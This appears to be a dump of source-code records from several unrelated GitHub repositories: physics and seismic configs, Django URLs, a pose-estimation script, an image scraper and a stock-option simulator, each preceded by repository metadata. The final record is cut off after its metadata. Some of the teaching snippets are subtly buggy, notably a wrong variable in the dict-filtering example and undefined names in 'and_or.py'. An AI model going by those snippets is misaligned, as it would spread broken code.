91d50cf45a97dacfbb3c939c17de07a29a3a08ad
16ea89da61e52d75239286851b7b2fa98c3024a3
/CosmicAnalysis/test/runCosmicAnalysis.py
0d50e9cfcd35b815280922045d7b2f74eaa65a5c
[]
no_license
watson-ij/CosmicAnalysis
67492bf1bb3318429a604c5588fee9bafdbb0900
a3b2887523930a1da781fa73f575b37785b2b174
refs/heads/master
2023-06-09T03:05:44.908091
2021-07-02T05:33:23
2021-07-02T05:33:23
381,917,861
0
0
null
null
null
null
UTF-8
Python
false
false
1,888
py
import FWCore.ParameterSet.Config as cms from Configuration.StandardSequences.Eras import eras process = cms.Process('CosmicAnalysis',eras.Run3) process.load("FWCore.MessageService.MessageLogger_cfi") process.load('Configuration.StandardSequences.GeometryRecoDB_cff') process.load('Configuration.StandardSequences.MagneticField_AutoFromDBCurrent_cff') process.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff') process.load('RecoMuon.TrackingTools.MuonServiceProxy_cff') process.load('TrackingTools.TransientTrack.TransientTrackBuilder_cfi') from Configuration.AlCa.GlobalTag import GlobalTag process.GlobalTag = GlobalTag(process.GlobalTag, '113X_dataRun3_Prompt_v2', '') process.MessageLogger.cerr.FwkReport.reportEvery = 5000 process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) ) #process.maxEvents.input = cms.untracked.int32(10) # Input source process.source = cms.Source("PoolSource", fileNames = cms.untracked.vstring()) process.source.skipEvents = cms.untracked.uint32(0) from glob import glob process.source.fileNames.extend( # ['/store/express/Commissioning2021/ExpressCosmics/FEVT/Express-v1/000/342/218/00000/007c63b2-8625-44ed-b1e6-a13ee77f2a42.root'], [f.replace('/eos/cms','') for f in glob('/eos/cms/store/express/Commissioning2021/ExpressCosmics/FEVT/Express-v1/000/342/218/00000/*')] # [('file:'+f) for f in glob('/eos/cms/store/express/Commissioning2021/ExpressCosmics/FEVT/Express-v1/000/342/218/00000/*')][:5] ) process.options = cms.untracked.PSet() process.TFileService = cms.Service("TFileService",fileName = cms.string("cosmics.root")) process.CosmicAnalysis = cms.EDAnalyzer('CosmicAnalysis', process.MuonServiceProxy, gemRecHits = cms.InputTag("gemRecHits"), cscSegments = cms.InputTag("cscSegments"), muons = cms.InputTag("muons"), ) process.p = cms.Path(process.CosmicAnalysis)
a0af7a358d5cf743246b22a5c21c9a74cf6da2de
e4920699d195c1a831d90e9f5470df71648943bf
/lists/urls.py
671dc88708da597a71c7e5c24a595589fda3ae54
[]
no_license
kuchichan/test_goat
b27ff4b8b94fb3b95c1d26e52337d4cbd1475dcf
603d2f09d4368fb6893541a81daa23b09f621e64
refs/heads/master
2021-07-11T12:45:02.067314
2020-09-19T22:12:53
2020-09-19T22:12:53
204,347,922
0
1
null
2019-11-17T13:12:18
2019-08-25T20:46:09
Python
UTF-8
Python
false
false
1,039
py
"""superlists URL Configuration The `urlpatterns` list routes URLs to views. For more information please see: https://docs.djangoproject.com/en/1.11/topics/http/urls/ Examples: Function views 1. Add an import: from my_app import views 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home') Class-based views 1. Add an import: from other_app.views import Home 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home') Including another URLconf 1. Import the include() function: from django.conf.urls import url, include 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls')) """ from django.conf.urls import url from lists import views urlpatterns = [ url(r'^new$', views.NewListView.as_view(), name='new_list'), url(r'^(?P<pk>\d+)/$', views.ViewAndAddToList.as_view(), name='view_list'), url(r'^(?P<pk>\d+)/share/$', views.ShareListView.as_view(), name='share_list'), url(r'^users/(?P<email>.+)/$', views.MyListsView.as_view(), name='my_lists'), ]
01945a6a9fe9671dde25ee92c1525856eac4cfcc
12f6466ba8fad1293e78ee123ad56938bd515a16
/and_or.py
61febdeeaae77f6e04f213087888888a5d958498
[]
no_license
greshem/develop_python
9dd1eaac4137b0c5b5b9f822bba07a8d6fa0f9ae
ddd370a35c63a89c5885f0918e3fe1d44c2a3069
refs/heads/master
2021-01-19T01:53:09.502670
2017-10-08T12:14:33
2017-10-08T12:14:33
45,077,612
1
0
null
null
null
null
UTF-8
Python
false
false
184
py
import os import re if not os.path.exists("test4.py") and not 0: print "There is no gtest.zip" def check_env(): if 1==find_bake and 1==find_vc2003: return 1 else: return 0
c9377460124a516d9b3e84d11eb0cd06931ea316
0fd5793e78e39adbfe9dcd733ef5e42390b8cc9a
/python3/06_Collections/04_Dictionaries/m_dict_deepcopy.py
f87a64bcfe2a9745cf195aea1c8c7a956c93a781
[]
no_license
udhayprakash/PythonMaterial
3ea282ceb4492d94d401e3bc8bad9bf6e9cfa156
e72f44e147141ebc9bf9ec126b70a5fcdbfbd076
refs/heads/develop
2023-07-08T21:07:33.154577
2023-07-03T10:53:25
2023-07-03T10:53:25
73,196,374
8
5
null
2023-05-26T09:59:17
2016-11-08T14:55:51
Jupyter Notebook
UTF-8
Python
false
false
742
py
import copy from pprint import pp payload = { "DOB": "-", "age": 25, "education": {"college": "Yale", "highschool": "N/A"}, "hobbies": ["running", "coding", "-"], "name": {"first": "Robert", "last": "Smith", "middle": ""}, } pp(payload) payload1 = copy.deepcopy(payload) for key, value in payload.items(): if isinstance(value, (str, int, float)): if value in ("N/A", "-", ""): del payload1[key] elif isinstance(value, list): payload1[key] = [s_val for s_val in value if not (value in ("N/A", "-", ""))] elif isinstance(value, dict): for skey, sval in value.items(): if sval in ("N/A", "-", ""): del payload1[key][skey] print() pp(payload1)
dafd4069662cee4fb9446b0d89b3fa38abdc8f5d
1cc638da0163ca7c8578b659fc0b067cc5d25265
/server/migrations/versions/e160191ff485_.py
8740099a7a050a53d9abd8c8b681bb46f187453a
[]
no_license
netang/label-it
a2591d456c8ed5c539bb2f0bf93caf2c3ef94d0c
1e9ac5d1040b0c49af7c1838e43a010c45378d13
refs/heads/master
2023-01-13T01:02:56.943956
2020-01-25T15:45:05
2020-01-25T16:08:13
212,176,509
0
0
null
2023-01-04T22:12:51
2019-10-01T18:59:44
Python
UTF-8
Python
false
false
711
py
"""empty message Revision ID: e160191ff485 Revises: Create Date: 2019-10-05 18:20:06.893067 """ from alembic import op import sqlalchemy as sa # revision identifiers, used by Alembic. revision = 'e160191ff485' down_revision = None branch_labels = None depends_on = None def upgrade(): # ### commands auto generated by Alembic - please adjust! ### op.create_table('tasks', sa.Column('id', sa.Integer(), nullable=False), sa.Column('name', sa.String(), nullable=True), sa.PrimaryKeyConstraint('id') ) # ### end Alembic commands ### def downgrade(): # ### commands auto generated by Alembic - please adjust! ### op.drop_table('tasks') # ### end Alembic commands ###
51a0ebcdec898e707954df31f6137beb9cc47715
e374785dd48ab3d3d8306c10b788983c2f2ac2e3
/search_old/urls.py
3dab893ca9935dc903b1902f04f567488d897a19
[ "MIT" ]
permissive
common1/newassetcms
0fd5ca2b310ccbd1f2ae432490b91ff22d352e2e
65eee3c2ed9dac4cc56bfff863a6cbaff9830d26
refs/heads/master
2022-12-15T22:17:45.613715
2019-07-25T05:54:46
2019-07-25T05:54:46
186,583,756
0
0
MIT
2022-12-08T05:06:46
2019-05-14T08:54:19
Python
UTF-8
Python
false
false
201
py
from django.conf.urls import url from django.urls import path from .views import ( SearchAssetView, ) app_name = 'search' urlpatterns = [ path('', SearchAssetView.as_view(), name='query'), ]
2f5d8559d038f71c467a9850b0d3b57bb4ada4c4
5d6140bde09548c43965c11ad1ab50237671e1f8
/Denise/par_example.py
6351adafbb5be520bdb508c3f5f4bccc88c6f929
[]
no_license
wyzhang120/GeophyPkgTools
fb27e44c0a550b5b83ab9bfd59b39d4e0a108c2d
b8233798573ddeb72ae0d81897ca64955818d3c5
refs/heads/master
2022-06-09T01:25:20.638459
2020-05-06T05:49:42
2020-05-06T05:49:42
223,804,561
0
0
null
null
null
null
UTF-8
Python
false
false
9,547
py
import os import numpy as np import PkgTools.Denise.denise_out as deniseIO from PkgTools.Denise.utils_denise import AcqCw2, print_factors, write_mfile from PkgTools.TOY2DAC_marm.utils_marmousi_cw import crop_mamousi from utils_model_building.util_model_building import mod2d from sympy.ntheory import factorint basedir = '/project/stewart/wzhang/src/DENISE-Black-Edition/par_fdtest' fmodel = 'CW_fdtest' fdenise_input = '{:s}.inp'.format(fmodel) fsrc = '{:s}_src.txt'.format(fmodel) frec = '{:s}_rec'.format(fmodel) fd_order = 8 # Mamousi segydir = '/project/stewart/wzhang/TOY2DAC/crosswell_toy2dac/FWI/Mamousi/model_full' fvp = 'MODEL_P-WAVE_VELOCITY_1.25m.segy' # unit = m/s fvs = 'MODEL_S-WAVE_VELOCITY_1.25m.segy' frho = 'MODEL_DENSITY_1.25m.segy' # unit = g/cc dxSgy = 1.25 npml = 20 dpml = npml * dxSgy x0 = 9100 - dpml x1 = 9600 + dpml - dxSgy z0 = 1600 - dpml z1 = 2600 + dpml - dxSgy fc = 80 # fmax = 2.76 * fc srctype = 1 # 1=explosive, 2=point force in x, 3=point force in z, 4=custom directive force acqOffset = 25 + dpml # unit = m, dx = 1.25 acqDz = 100 tmax = 2. vp = crop_mamousi(segydir, fvp, x0, x1, z0, z1) vs = crop_mamousi(segydir, fvs, x0, x1, z0, z1) rho = crop_mamousi(segydir, frho, x0, x1, z0, z1) * 1000 srcpar = {'x0': acqOffset, 'zmin': acqOffset, 'zmax': z1 - z0 - acqOffset, 'dz': acqDz, 'fname': os.path.join('source', fsrc), 'fc': fc, 'srctype': srctype, 'amp': 1.} recpar = {'x0': x1 - x0 - acqOffset, 'zmin': acqOffset, 'zmax': z1 - z0 - acqOffset, 'dz': acqDz, 'fname': os.path.join('receiver', frec)} acqObj = AcqCw2(srcpar, recpar) mod2dDict0 = {'vp': vp, 'rho': rho} acqDict0 = acqObj.acqdict modObj = mod2d(mod2dDict0, acqDict0, dxSgy, dxSgy) modObj.fdParams(fc, tmax, '{:d}'.format(fd_order)) para={ 'filename': os.path.join(basedir, 'CW_fdtest.inp'), 'descr': fmodel, 'MODE': 0, # forward_modelling_only=0;FWI=1;RTM=2 'PHYSICS': 2, # 2D-PSV=1;2D-AC=2;2D-VTI=3;2D-TTI=4;2D-SH=5 # domain decomposition and 2D grid 'NPROCX': 4, 'NPROCY': 7, 'NX': 100, 'NY': 100, 'DH': 1, # time stepping 'TIME': tmax, 'DT': 1e-3, # FD params 'FD_ORDER': 8, 'max_relative_error': 0, # Taylor (max_relative_error=0) and Holberg (max_relative_error=1-4) # source 'QUELLART': 1, # ricker=1 (delayed 1.5 / fc);fumue=2;from_SOURCE_FILE=3;SIN**3=4;Gaussian_deriv=5;Spike=6;Klauder=7 'SOURCE_FILE': os.path.join('./source', fsrc), 'SIGNAL_FILE': './wavelet/wavelet_cw', 'TS': 8, # duration_of_Klauder_wavelet_(in_seconds) 'SRCTYPE': srctype, # 1=explosive, 2=point force in x, 3=point force in z, 4=custom directive force 'RUN_MULTIPLE_SHOTS': 1, # multiple shots one by one 'FC_SPIKE_1': -5, # corner_frequency_of_highpass_filtered_spike 'FC_SPIKE_2': 15, # orner_frequency_of_lowpass_filtered_spike 'ORDER_SPIKE': 5, # order_of_Butterworth_filter 'WRITE_STF': 0, # write_source_wavelet # model 'READMOD': 1, # read_model_parameters_from_MFILE(yes=1) 'MFILE': os.path.join('./model', fmodel), 'WRITEMOD': 0, # boundary conditions 'FREE_SURF': 0, 'FW': npml, # width_of_absorbing_frame_(in_gridpoints) 'DAMPING': 3000, # Damping_velocity_in_CPML_(in_m/s) 'FPML': fc, # Frequency_within_the_PML_(Hz) 'npower': 2.0, 'k_max_PML': 1.0, # Q approximation 'L': 0, # Number_of_relaxation_mechanisms 'FL': 20000, # L_Relaxation_frequencies # snapshots 'SNAP': 1, # output_of_snapshots_(SNAP)(yes>0) 'SNAP_SHOT': 1, # write_snapshots_for_shot_no_(SNAP_SHOT) 'TSNAP1': 0.05, # first_snapshot_(in_sec) 'TSNAP2': 1, # last_snapshot_(in_sec) 'TSNAPINC': 0.05, # increment_(in_sec) 'IDX': 1, # increment_x-direction 'IDY': 1, # increment_y-direction 'SNAP_FORMAT': 3, # data-format 2=ASCII, 3=BINARY 'SNAP_FILE': './snap/{:s}_waveform_forward'.format(fmodel), # basic_filename # receiver input 'READREC': 1, # read_receiver_positions_from_file, 1=single_file, 2=multiple_files 'REC_FILE': os.path.join('./receiver', frec), # towed streamer 'N_STREAMER': 0, # The_first_(N_STREAMER)_receivers_in_REC_FILE_belong_to_streamer 'REC_INCR_X': 80, 'REC_INCR_Y': 0, # Cable_increment_per_shot # seismogram 'SEISMO': 2, # output_of_seismograms, 0: no seismograms; 1: particle-velocities; # 2: pressure (hydrophones); 3: curl and div; 4: everything 'NDT': 1, # samplingrate_(in_timesteps!) 'SEIS_FORMAT': 1, # SU(1);ASCII(2);BINARY(3) 'SEIS_FILE_VX': os.path.join('./seismo', '{:s}_vx'.format(fmodel)), # filename_for_Vx 'SEIS_FILE_VY': os.path.join('./seismo', '{:s}_vy'.format(fmodel)), # filename_for_Vy 'SEIS_FILE_CURL': os.path.join('./seismo', '{:s}_curl'.format(fmodel)), # filename_for_curl 'SEIS_FILE_DIV': os.path.join('./seismo', '{:s}_div'.format(fmodel)), # filename_for_div 'SEIS_FILE_P': os.path.join('./seismo', '{:s}_p'.format(fmodel)), # ilename_for_pressure # log file 'LOG_FILE': os.path.join('./log', fmodel), # log-file_for_information_about_progress_of_program 'LOG': 2, # 0=no log; 1=PE 0 writes this info to stdout; 2=PE 0 also outputs information to LOG_FILE.0 # FWI 'ITERMAX': 100, # number_of_TDFWI_iterations 'JACOBIAN': 'jacobian/jacobian_test', # output_of_gradient 'DATA_DIR': 'su/MARMOUSI_spike/DENISE_MARMOUSI', # seismograms_of_measured_data 'TAPER': 0, # cosine_taper_(yes=1/no=0) 'TAPERLENGTH': 4, # taper_length_(in_rec_numbers) 'GRADT1': 21, 'GRADT2': 25, 'GRADT3': 490, 'GRADT4': 500, # gradient_taper_geometry 'INVMAT1': 1, # type_of_material_parameters_to_invert_(Vp,Vs,rho=1; Zp,Zs,rho=2; lam,mu,rho=3) 'QUELLTYPB': 1, # adjoint_source_type_(x-y_components=1, y_comp=2, # x_comp=3, p_comp=4, x-p_comp=5, y-p_comp=6, x-y-p_comp=7) 'TESTSHOT_START': 25, 'TESTSHOT_END': 75, 'TESTSHOT_INCR': 10,# testshots_for_step_length_estimation # gradient taper geometry 'SWS_TAPER_GRAD_VERT': 0, # apply_vertical_taper_(yes=1) 'SWS_TAPER_GRAD_HOR': 0, # apply_horizontal_taper 'EXP_TAPER_GRAD_HOR': 2.0, # exponent_of_depth_scaling_for_preconditioning 'SWS_TAPER_GRAD_SOURCES': 0, # apply_cylindrical_taper_(yes=1) 'SWS_TAPER_CIRCULAR_PER_SHOT': 0, # apply_cylindrical_taper_per_shot 'SRTSHAPE': 1, # damping shape (1=error_function,2=log_function) 'SRTRADIUS': 5., # radius_in_m, minimum for SRTRADIUS is 5x5 gridpoints 'FILTSIZE': 1, # filtsize_in_gridpoints 'SWS_TAPER_FILE': 0, # read_taper_from_file_(yes=1) # output of ivnerted models 'INV_MOD_OUT': 1, # write_inverted_model_after_each_iteration_(yes=1) 'INV_MODELFILE':'model/modelTest', # output_of_models # upper and lower limits of model params 'VPLOWERLIM': 3000, 'VPUPPERLIM': 4500, # lower/upper_limit_for_vp/lambda 'VSLOWERLIM': 1500, 'VSUPPERLIM': 2250, # lower/upper_limit_for_vs/mu 'RHOLOWERLIM': 2000, 'RHOUPPERLIM': 2600, # lower/upper_limit_for_rho 'QSLOWERLIM': 10, 'QSUPPERLIM': 100, # ower/upper_limit_for_Qs # optimization method 'GRAD_METHOD': 2, # gradient_method_(PCG=1/LBFGS=2) 'PCG_BETA': 2, # preconditioned conjugate gradeint # Fletcher_Reeves=1, Polak_Ribiere=2, Hestenes_Stiefel=3, Dai_Yuan=4 'NLBFGS': 20, # save_(NLBFGS)_updates_during_LBFGS_optimization # smoothing models 'MODEL_FILTER': 0, # apply_spatial_filtering_(1=yes) 'FILT_SIZE': 5, # filter_length_in_gridpoints # Reduce size of inversion grid 'DTINV': 3, # use_only_every_DTINV_time_sample_for_gradient_calculation # step length estimation 'EPS_SCALE': 0.01, # maximum_model_change_of_maximum_model_value 'STEPMAX': 6, # maximum_number_of_attemps_to_find_a_step_length 'SCALEFAC': 2.0, # trace killing 'TRKILL': 0, # apply_trace_killing_(yes=1) 'TRKILL_FILE': './trace_kill/trace_kill.dat', # # time damping 'PICKS_FILE': './picked_times/picks_', # files_with_picked_times # FWI log 'MISFIT_LOG_FILE': 'LOG_TEST.dat', # log_file_for_misfit_evolution 'MIN_ITER': 0, # minimum number of iteration per frequency # Definition of smoothing the Jacobians with 2D-Gaussian 'GRAD_FILTER': 0, # apply_spatial_filtering_(yes=1) 'FILT_SIZE_GRAD': 10, # filter_length_in_gridpoints # FWT double-difference time-lapse mode 'TIMELAPSE': 0, # activate_time_lapse_mode_(yes=1); if TIMELAPSE == 1, # DATA_DIR should be the directory containing the data differences 'DATA_DIR_T0': 'su/CAES_spike_time_0/DENISE_CAES', # seismograms_of_synthetic_data_at_t0_() # RTM 'RTMOD': 0, # apply_reverse_time_modelling_(yes=1) 'RTM_SHOT': 0, # output_of_RTM_result_for_each_shot_(yes=1) # gravity modeling/inversion 'GRAVITY': 0, # 0 = no gravity modeling, 1 = active_gravity_modelling_, 2=inversion } para['DH'] = modObj.dx para['DT'] = modObj.dt para['TIME'] = modObj.dt * modObj.nt nx, nz = modObj.vp.shape vptest = np.ones((nx, nz), dtype=np.float32) * 3000 vstest = np.ones((nx, nz), dtype=np.float32) * 3000 rhotest = np.ones((nx, nz), dtype=np.float32) * 2000 deniseIO.calc_max_freq(vptest, vstest, para) deniseIO.check_stability(vptest, vstest, para) para['FW'] = int(dpml / para['DH']) para['DAMPING'] = 3000 print_factors(nx, nz) para['NPROCX'] = 4 para['NPROCY'] = 7 para['NX'] = nx para['NY'] = nz deniseIO.check_domain_decomp(para) deniseIO.write_denise_para(para) acqObj.write_acq(basedir) dict_mfile = {'vp': vptest, 'vs': vstest, 'rho': rhotest} write_mfile(para['MFILE'], dict_mfile, basedir)
0b0864d7bcd9a8bbbafc7d85f9f8e90a96bd8a47
d94b6845aeeb412aac6850b70e22628bc84d1d6d
/metapose/launch_anipose.py
928740a6681f6e2cee01b6aa52cdd923c73d23b3
[ "CC-BY-4.0", "Apache-2.0" ]
permissive
ishine/google-research
541aea114a68ced68736340e037fc0f8257d1ea2
c1ae273841592fce4c993bf35cdd0a6424e73da4
refs/heads/master
2023-06-08T23:02:25.502203
2023-05-31T01:00:56
2023-05-31T01:06:45
242,478,569
0
0
Apache-2.0
2020-06-23T01:55:11
2020-02-23T07:59:42
Jupyter Notebook
UTF-8
Python
false
false
7,366
py
# coding=utf-8 # Copyright 2023 The Google Research Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Launch script for running a classical bundle adjustment baseline.""" from absl import app from absl import flags from aniposelib import cameras as anipose_cameras import cv2 import numpy as np import tensorflow as tf import tensorflow_datasets as tfds from metapose import data_utils from metapose import inference_time_optimization as inf_opt _INPUT_PATH = flags.DEFINE_string('input_path', '', '') _OUTPUT_PATH = flags.DEFINE_string('output_path', None, '') _DEBUG_FIRST_N = flags.DEFINE_integer('debug_first_n', None, 'read only first n records') _CAM_SUBSET = flags.DEFINE_list('cam_subset', list(map(str, range(4))), '') _ADJUST_CAM = flags.DEFINE_bool('adjust_cam', True, 'true - BA on cams, false - triangulation') _GT_INIT = flags.DEFINE_bool('gt_init', True, '') _GT_HT = flags.DEFINE_bool('gt_ht', False, '') flags.mark_flag_as_required('output_path') def get_anipose_gt_camera(data_rec, cam_id): """Get AniPose.Camera with GT initialization.""" cam_pose3d, cam_rot, cam_intr = [ data_rec[x] for x in ['cam_pose3d', 'cam_rot', 'cam_intr'] ] rot_mat = cam_rot[cam_id].numpy() t = cam_pose3d[cam_id].numpy() rvec = cv2.Rodrigues(rot_mat)[0] tvec = np.dot(rot_mat, -t) f = np.mean(cam_intr[cam_id][:2]) k1 = 0 params = np.concatenate([rvec.ravel(), tvec.ravel(), [f, k1]]) camera = anipose_cameras.Camera() camera.set_params(params) return camera def perturb_anipose_camera(cam): ani_params = cam.get_params() new_ani_params = np.concatenate([np.random.normal(size=6), ani_params[6:]]) cam.set_params(new_ani_params) def get_pppx_pose2d_pred_and_gt(data_rec, cam_id): """Get 2D pose GT and mean predicted per-view 2D pose in pixels.""" bbox = data_rec['bboxes'][cam_id].numpy() size = np.maximum(bbox[1] - bbox[0], bbox[3] - bbox[2]) origin = np.stack([bbox[2], bbox[0]], axis=-1) pose2d_mean_pred = data_rec['pose2d_pred'][cam_id].numpy() pose2d_gt = data_rec['pose2d_repr'][cam_id].numpy() pp = data_rec['cam_intr'][cam_id][2:].numpy() pose2d_mean_pred_pix = pose2d_mean_pred * size + origin - pp pose2d_gt_pix = pose2d_gt * size + origin - pp return pose2d_mean_pred_pix, pose2d_gt_pix def run_anipose_bundle_adjustment(data_rec, ba_cam=True, gt_init=True, gt_ht=False): """Run AniPose bundle adjustment.""" n_cam = data_rec['cam_rot'].shape[0] cameras = [get_anipose_gt_camera(data_rec, i) for i in range(n_cam)] if not gt_init: for cam in cameras: perturb_anipose_camera(cam) gt_idx = 1 if gt_ht else 0 pose2d_preds = np.array( [get_pppx_pose2d_pred_and_gt(data_rec, i)[gt_idx] for i in range(n_cam)]) camera_group = anipose_cameras.CameraGroup(cameras) if ba_cam: error = camera_group.bundle_adjust_iter(pose2d_preds) pose3d_pred = camera_group.triangulate(pose2d_preds) ani_params_cam0 = camera_group.cameras[0].get_params() rot_mat_cam0 = cv2.Rodrigues(ani_params_cam0[:3])[0] pose3d_pred_cam0 = pose3d_pred @ rot_mat_cam0.T all_ani_params = np.array([c.get_params() for c in camera_group.cameras]) return pose3d_pred_cam0, all_ani_params, error def pmpje(pose3d_pred, pose3d_gt): aligned_pose = inf_opt.align_aba(pose3d_pred, pose3d_gt)[0] diff = aligned_pose - pose3d_gt return tf.reduce_mean(tf.linalg.norm(diff, axis=-1), axis=-1) def center_pose(pose3d): return pose3d - tf.reduce_mean(pose3d, axis=0, keepdims=True) def nmpje_pck(pose3d_pred_cam0, pose3d_gt_cam0, threshold=150): """Compute Normalized MPJE and PCK metrics.""" norm = tf.linalg.norm pose3d_gt_cent = center_pose(pose3d_gt_cam0) pose3d_pred_cent = center_pose(pose3d_pred_cam0) scale_factor = norm(pose3d_gt_cent) / norm(pose3d_pred_cent) pose3d_pred_cent_scaled = scale_factor * pose3d_pred_cent diff = pose3d_gt_cent - pose3d_pred_cent_scaled err = errs = tf.linalg.norm(diff, axis=-1) nmpje = tf.reduce_mean(err, axis=-1) pck = tf.reduce_mean(tf.cast(errs < threshold, tf.float32)) * 100 return nmpje, pck def run_and_evaluate(data_rec, cam_subset, adjust_cam, gt_init, gt_ht): """Run AniPose bundle adjustment and compute metrics.""" data_rec = inf_opt.convert_rec_pose2d_to_bbox_axis(data_rec) data_rec = inf_opt.take_camera_subset(data_rec, cam_subset) pose3d_gt = data_rec['pose3d'].numpy() pose3d_gt_cam0 = (pose3d_gt @ tf.transpose(data_rec['cam_rot'][0])) pose3d_pred_cam0, ani_params_pred, ba_error = run_anipose_bundle_adjustment( data_rec, adjust_cam, gt_init, gt_ht) errs = np.array([ ba_error, pmpje(pose3d_pred_cam0, pose3d_gt), *nmpje_pck(pose3d_pred_cam0, pose3d_gt_cam0) ]) output = { **data_rec, 'pose3d_pred_cam0': pose3d_pred_cam0, 'ani_params_pred': ani_params_pred, 'ba_pmpje_nmpje_pck_errs': errs, } output_np = {k: np.array(v) for k, v in output.items()} return output_np def main(_): cam_subset = list(map(int, _CAM_SUBSET.value)) n_cam = len(cam_subset) output_shape_dtype = { # anipose results 'pose3d_pred_cam0': ([17, 3], tf.float64), 'ani_params_pred': ([n_cam, 8], tf.float64), 'ba_pmpje_nmpje_pck_errs': ([ 4, ], tf.float64), # input data 'pose3d': ([17, 3], tf.float64), 'cam_pose3d': ([n_cam, 3], tf.float64), 'cam_rot': ([n_cam, 3, 3], tf.float64), 'cam_intr': ([n_cam, 4], tf.float64), 'cam_kd': ([n_cam, 5], tf.float64), 'pose2d_gt': ([n_cam, 17, 2], tf.float64), 'pose2d_repr': ([n_cam, 17, 2], tf.float64), 'heatmaps': ([n_cam, 17, 4, 4], tf.float64), # note! pose2d_pred is actually the "mean heatmap" 2D pred 'pose2d_pred': ([n_cam, 17, 2], tf.float64), 'keys': ([n_cam], tf.string), 'bboxes': ([n_cam, 4], tf.int32), 'pose3d_epi_pred': ([n_cam, 17, 3], tf.float32), # config 'cam_subset': ([n_cam], tf.int32), } output_spec = tfds.features.FeaturesDict({ k: tfds.features.Tensor(shape=s, dtype=d) for k, (s, d) in output_shape_dtype.items() }) ds = data_utils.read_tfrec_feature_dict_ds(_INPUT_PATH.value) if _DEBUG_FIRST_N.value is not None: ds = ds.take(_DEBUG_FIRST_N.value) dataset = [] for _, data_rec in ds: opt_stats = run_and_evaluate(data_rec, cam_subset, _ADJUST_CAM.value, _GT_INIT.value, _GT_HT.value) print('ba / pmpje / nmpje / pck', opt_stats['ba_pmpje_nmpje_pck_errs']) dataset.append(opt_stats) data_utils.write_tfrec_feature_dict_ds(dataset, output_spec, _OUTPUT_PATH.value) if __name__ == '__main__': app.run(main)
a8572ed76842012079600e505ff96ed2f3ad217c
4e79c63941476046816d937d4e8f90d26c05e748
/main_bulk.py
c098c9d204231295e56f6df7995e53d5981cb4fd
[]
no_license
ouromoros/booru_downloader
a41963c8d0c9317d9934bf5c251b44c4f7917440
b86b0f63d3a0fb001bc601534fe2434940a95955
refs/heads/master
2021-04-03T06:54:00.869390
2018-10-22T10:35:15
2018-10-22T10:35:15
124,854,821
2
0
null
null
null
null
UTF-8
Python
false
false
2,257
py
import requests import time from bs4 import BeautifulSoup import os from optparse import OptionParser import datetime import threading # paramaters to be defined website = 'http://konachan.net/post' # 'http://lolibooru.moe/post' download_path = '/home/chaos/opt/pip/white' tags = '' pages = 1 image_count = 1 class dThread(threading.Thread): def __init__(self, fadr): threading.Thread.__init__(self) self.fadr = fadr def run(self): name = requests.utils.unquote(self.fadr[self.fadr.rfind('/') + 1:]) self.iname = name if os.path.isfile(download_path + '/' + name): return if not os.path.isdir(download_path): os.mkdir(download_path) print('Downloading ' + name[name.rfind('/') + 1:]) content = requests.get(self.fadr) with open(download_path + '/' + name, 'wb') as f: f.write(content.content) def dpage(page): main_page = requests.get(website, params={'tags': tags, 'page': page}) soup = BeautifulSoup(main_page.text, 'html.parser') images = soup.find_all('a', class_='directlink') #soup.find_all('a', {'class': 'directlink smallimg'}) threads = [] for img in images: t = dThread('http:' + img['href']) t.start() threads.append(t) time.sleep(0.5) for t in threads: t.join() print('Fnished downloading {}'.format(t.iname)) def arguments(): parser = OptionParser() parser.add_option("-t", "--tag", help="the tags of picture you want") parser.add_option('-p', '--page', help='pages of images you want') parser.add_option('-u', '--url', help='url of the target website') parser.add_option( '-d', '--directory', help='directory where pictures are to be stored') return parser.parse_args() if __name__ == '__main__': # processing args (options, args) = arguments() # download_path += ('/' + str(datetime.date.today())) if options.tag: tags = options.tag if options.page: pages = int(options.page) if options.url: website = options.url if options.directory: download_path = options.directory # Downloading files for i in range(pages): dpage(i + 1)
ad2330d8afc9b51696c93c8c657b6ae40639a143
890657e5e5d0668fdb7015abc3ea78313b9abcbf
/simStock.py
c4122c978895211fae5145f404e84607235e2269
[]
no_license
grsmith1943/econophysics
4d3f72f1b4761364136978c94614895c7cc0e325
eef63511dbabec637272368bbb7a47a3b4caa670
refs/heads/master
2021-06-14T03:33:44.307066
2017-03-06T05:40:17
2017-03-06T05:40:17
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,685
py
import sys import numpy as np import matplotlib.pyplot as plt # simulates the path of a stock and outputs the estimated call and put prices def simStock(r=0.01, mu=0.01, sigma=0.01, T=60, S=15, X=15, N=1000, n=30): dt = T/N calls, puts = [None]*n, [None]*n for path in range(n): pathPrice = [None] * N pathPrice[0] = S for j in range(N - 1): epsilon = np.random.normal() dS = pathPrice[j] * (mu*dt + sigma*epsilon*dt**0.5) pathPrice[j+1] = pathPrice[j] + dS #get the call and put price for this particular option calls[path] = np.exp(-1*r*T) * max(pathPrice[-1] - X, 0) puts[path] = np.exp(-1*r*T) * max(X - pathPrice[-1], 0) plt.plot(pathPrice) callPrice = np.mean(calls) putPrice = np.mean(puts) print("Given that the option's strike price is %f and days till expiry is %i:"%(X,T)) print("The optimal call price:", callPrice) print("The optimal put price: ", putPrice) #opens the window that actually displays the plots on top of each other plt.xlabel("Day") plt.ylabel("Asset price (USD)") plt.show() def main(): r = float(input("Risk-free interest rate: ")) mu = float(input("Asset's daily return rate: ")) sigma = float(input("Volatility of asset: ")) T = float(input("Days till this option's expiry date: ")) S = float(input("Asset's current price: ")) X = float(input("This option's strike price: ")) N = int(input("Time steps per simulation: ")) n = int(input("Number of simulation paths: ")) simStock(r=r, mu=mu, sigma=sigma, T=T, S=S, X=X, N=N, n=n) if __name__ == '__main__': main()
e7e8f4cff06e14fcbc56bac03f97f74a51c810d3
c1ed05a3c546d3580ac0bb0e66bcaddaf8d78b28
/app/models/time_utils.py
584226049bdc48b57f288886692a59ca9c223514
[]
no_license
lelandbatey/whereIAm
382108fd296ab69e97ac8bf6a11a3aaf7cef7de4
66c071cce541f65bfcf1a1865948e5a4abe55601
refs/heads/master
